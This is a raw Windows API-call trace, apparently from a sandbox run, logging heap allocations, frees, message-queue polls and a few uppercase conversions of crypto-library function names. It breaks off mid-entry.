[0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0256.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0256.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0256.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0256.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0256.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0256.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0256.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0256.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0256.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0256.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0256.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0256.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0256.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0256.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0256.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0256.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0256.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0256.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0256.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0256.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0256.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0256.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0256.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0256.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0256.381] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0256.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0256.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0256.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0256.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0256.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0256.382] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0256.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0256.382] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0256.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0256.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0256.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0256.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0256.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0256.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0256.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0256.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0256.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0256.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0256.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0256.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0256.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0256.383] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0256.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0256.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0256.383] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.383] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0256.383] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0256.383] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0256.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.384] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0256.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0256.384] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0256.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.384] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0256.384] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0256.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0256.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0256.385] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0256.385] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0256.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0256.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.386] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0256.386] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0256.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0256.386] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0256.387] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0256.387] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0256.387] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0256.387] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0256.387] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0256.388] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0256.388] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0256.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0256.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0256.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0256.388] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0256.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.388] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0256.388] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0256.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0256.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0256.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0256.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0256.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0256.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0256.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0256.389] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.389] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0256.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 